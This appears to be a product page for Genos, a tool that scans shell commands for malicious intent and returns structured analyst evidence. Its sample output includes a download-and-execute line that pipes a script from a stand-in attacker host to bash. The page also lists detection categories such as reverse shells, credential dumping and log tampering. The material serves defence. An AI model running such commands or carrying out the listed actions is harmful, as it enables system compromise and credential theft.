Download-and-execute
Curl or wget piped directly to a shell interpreter, including encoded variants.
Genos scans shell, PowerShell, and scripting commands. It deobfuscates encoded payloads, classifies intent with a CodeBERT gatekeeper, reconstructs attack stage and behavior using a specialist encoder, and returns structured evidence an analyst can act on.
{
"label": "Malicious",
"label_confidence": 96.4,
"decision_margin": 81.2,
"attack_stage": "Execution",
"triggered_features": ["has_pipe_to_shell", "has_download"],
"deobfuscated_cmd": "curl http://evil.com/shell.sh | bash",
"behavior": {
"stage": "Execution",
"action_tags": ["download_remote_resource", "pipe_to_shell"]
},
"evidence": {
"urls": ["http://evil.com/shell.sh"],
"evidence_summary": "curl remote resource download, inline code execution."
}
}Entropy checks, base64 decoding, encoded PowerShell unwrapping, char-construction and concatenation cleanup.
CodeBERT model scores Benign / Suspicious / Malicious with confidence and margin tracking.
Semantic features plus rule-engine signals infer execution stage, action tags, and MITRE context.
IOC rollup, mapping reasons, severity, analyst hints, and decoded payload returned in one response.
Curl or wget piped directly to a shell interpreter, including encoded variants.
Base64, PowerShell -EncodedCommand, char-code constructions, and high-entropy strings.
Cron additions, SUID bits, sudoers modifications, service and autorun changes.
Shadow file reads, credential dump tooling, SSH key enumeration, service account token access.
Reverse shells, SSH port forwarding, chisel, socat, and known post-exploitation tools.
Firewall flush, audit daemon stops, log truncation, and Defender disablement.